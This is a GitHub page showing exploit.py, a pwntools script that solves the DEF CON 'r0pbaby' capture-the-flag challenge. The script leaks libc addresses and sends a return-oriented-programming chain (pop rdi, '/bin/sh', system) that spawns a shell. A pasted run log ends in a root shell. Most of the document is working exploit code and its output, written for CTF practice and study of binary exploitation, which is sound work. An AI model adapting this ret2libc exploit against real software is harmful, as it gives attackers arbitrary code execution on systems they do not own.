-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathexploit.py
49 lines (37 loc) · 1.23 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from pwn import *
p = process('./r0pbaby_542ee6516410709a1421141501f03760')
#p = remote("127.0.0.1", "1337")
context(os = "linux", arch = "amd64")
#context.log_level = 'DEBUG'
p.sendline("2")
p.sendlineafter("symbol: ", "system")
system = long(p.recvline_startswith("Symbol")[-18:].lower(), 16)
log.success("System address: " + str(hex(system)))
system_offset = 0x42510 # system@@GLIBC_2.2.5
pop_rdi_offset = 0x2144f # 0x000000000002144f : pop rdi ; ret
sh_offset = 0x17d3f3 # 17d3f3 /bin/sh
base_libc = system - system_offset
log.success("Base libc address: " + str(hex(base_libc)))
junk = "A" * 8
pop_rdi = p64(pop_rdi_offset + base_libc)
sh = p64(sh_offset + base_libc)
system = p64(system)
payload = junk + pop_rdi + sh + system
p.sendlineafter(": ", "3")
p.sendlineafter(": ", str(len(payload)))
p.sendline(payload)
p.interactive()
'''
kaorz@kali:~/Exp/r0pbaby_defcon_challenge# python exploit.py
[+] Starting local process './r0pbaby_542ee6516410709a1421141501f03760': pid 15313
[+] System address: 0x7f3c81a45510
[+] Base libc address: 0x7f3c81a03000
[*] Switching to interactive mode
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
$ id
uid=0(root) gid=0(root) grupos=0(root)
'''